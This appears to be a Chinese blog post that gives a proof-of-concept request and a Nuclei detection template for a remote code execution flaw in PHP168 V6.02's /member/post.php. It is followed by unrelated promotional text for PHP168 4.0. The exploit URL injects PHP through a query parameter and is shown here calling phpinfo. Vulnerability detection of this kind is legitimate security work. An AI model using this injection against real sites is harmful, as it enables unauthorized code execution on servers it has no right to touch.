Nuclei关于php168 V6.02 的POC

漏洞利用

这个漏洞是在 /member/post.php 中存在一个代码执行漏洞

利用步骤:

        1. 先注册一个用户
        2.执行下面代码,get方式就可以了

http://targetURL/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML

利用Nuclei 进行检测这个漏洞

id: php168-v602

info:
  name: php168-v6.02 - Remote Code Execution
  author: dr_set
  severity: high
  description: PHP168 V6.02 has a remote code execution vulnerability.
  reference: https://www.seebug.org/vuldb/ssvid-94372
  tags: remote, code execution, php168, rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML"
#    headers:
#        Cookie: ${cookie}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by md on 2022/10/05
# 使用方法: 需要加上参数   -H "Cookie: this is cookie"

 ./nuclei.exe   -u http://192.168.83.242:9090/ -t .\php168-v602.yaml -H "Cookie: your Cookie"

如上图所示,当你的php168网站存在这个问题的时候,就会被检测到了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
为什么要选择PHP168整站4.0系统? 1.源代码全部开源不加密,可以很方便的进行二次开发,可以说:在CMS界,开源的CMS源代码实属罕见 2.可以很好的满足个人,企业,门户建站的需要. 3.功能极其的强大完善,文章栏目支持无限级分类,支持自定义风格与模板,可以由栏目变成一个频道。 4.对广大用户而言,完全免费使用,并且在论坛提供免费技术支持. 5.扩展性非常强,可以自由安装官方提供下载、商城、图库、音乐、视频、博客等等模块。 6.可以很好的整合discuz论坛与phpwind论坛的用户系统.最关键的是纯绿色整合,不修改原论坛的数据结构与程序文件.丝毫不影响原论坛的正常运行。 7.还有更多的特色功能,尽在不言中,大家慢慢体会吧。 A、文章系统 1.支持无限级分类. 2.被误删除的内容,支持从回收站还原到之前的栏目. 3.列表页,内容页支持标签功能,只需要往html模板里插入$label[abc]这类的标签,就能在后台调用任何文章数据及其他图片,FLASH等数据. 4.栏目列表页与内容页都支持自由选择模板,因而可以做出极具个性的单个内容页或列表页.过去只能由风格实现,现在同时可以由风格与模板实现. 5.非常强大的权限,列表页支持某些用户组能看标题而不能看内容,或者都不能看标题与内容.哪些用户能看内容但无权下载附件.每个栏目都有对应的版主. 6.某些栏目当设置标签太多时,影响速度的情况下,可以设置缓存.这可以大大加快速度.缓存时间自由设置. 7.文章可以指定从什么时候到什么时候允许用户浏览,超过这个时间段或者还没到这个时间段,将不能浏览. 8.内容页可以设置跳转到外部网址,或者可以做到类似奇虎那样框架外面的网址 9.后台发表文章可以选择代码方式发表或可视化方式发表.代码方式比较简洁,节省数据库空间. 10.可以设定哪些栏目给游客在前台投稿,也可以设定某些栏目给指定的用户组投稿.而其他栏目就没权投稿. 11.支持全站生成静态功能. 12.可设置未经审核的文章是否允许用户浏览. 13.可设置是否自动获取文章内的图片做为文章的缩略图. 14.通过AJAX实现无刷新评论功能.即评论文章不会刷新整个网页. 15.后台支持往文章系统批量发表图片或发表组图功能 16.支持续页发表功能,比如一篇文章太长,可以分多页,并且由此可以实现长篇小说功能. 17.文章可以实现提前或沉底功能,提前的话,可以设置提到某篇文章前面,沉底的话,可以实现提到某篇文章后面.当然也可以最前,或最后. 18.文章栏目可以变成频道,一个频道可以生成一个独立的目录,可以是一级目录,也可以是二级,三级,四级目录.这样的话,就可以绑定一个二级域名. 19.不用设置服务器也能使用伪静态功能,增加谷歌的收录量,另外还可以设置成与论坛一样的伪静态。 20.功能太多,难以一一述说,大家慢慢体会吧. B、强大的用户权限系统 1.后台可以自由添加用户组. 2.可以自由设置哪些用户组可以进后台,并且拥有哪些权限. 3.用户成员可以拥有多个附加用户组.这为今后前台的功能扩展留下很大的接口 C、强大的采集系统 1.自带新浪新闻采集系统,可以很方便自由的采集新浪国内、国际、社会、娱乐、科技、财经、军事、体育精选新闻。 2.可以自由添加采集参数,并且可以共享采集参数,即可把采集参数导出来,分享给其他人。 3.可以很方便的采集类似奇虎这样的新闻,也就是说你可以做一个像奇虎这样的站。 D、强大的数据库备份功能 1.可以指定备份站外或站内的数据,站内指本CMS系统。当然也可以指定备份哪些数据表的数据。 2.强大的分卷备份功能,可以自由切取每卷文件的大小。 3.可以指定每次读取几条数据,数值大,备份快,数值小,有利于一些虚拟机空间的备份成功率,不被中断。 4.可以指定备份出来的数据为适应mysql高版本或低版本。 5.备份出来的数据,可以自适应MYSQL的高版本或低版本,极其的方便用户,因为有些用户对这个高低版本概念不清楚。 6.备份出来的数据,极其方便空间转移。比如转移空间后,把备份的数据传到一个新目录,然后在地址栏目输入这个目录的访问地址,即可还原。完全不用进入后台。这对新手来说,转移空间是非常方便的。 7.当然也自带有数据库管理工具。 E、极其灵活的广告系统 1.此广告系统追求实用为主,目前有文字、图片、FLASH、代码等广告位。 2.每个广告会有一个独立的全局变量标签{$AD_label['**']}你把他放到网页模板的任意地方,即可调其显示其中的信息,因此你还可以借此做为网站内容的布置 F、强大的字符替换功能 1.你可以批量替换文章中已经存在的不健康字符或者不想见到的字符 G、强大的投票系统 1.可以自由添加或删除投票项目 2.可以控制投票单选还是多选项 3.可以把投票生成JS代码给别的系统使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值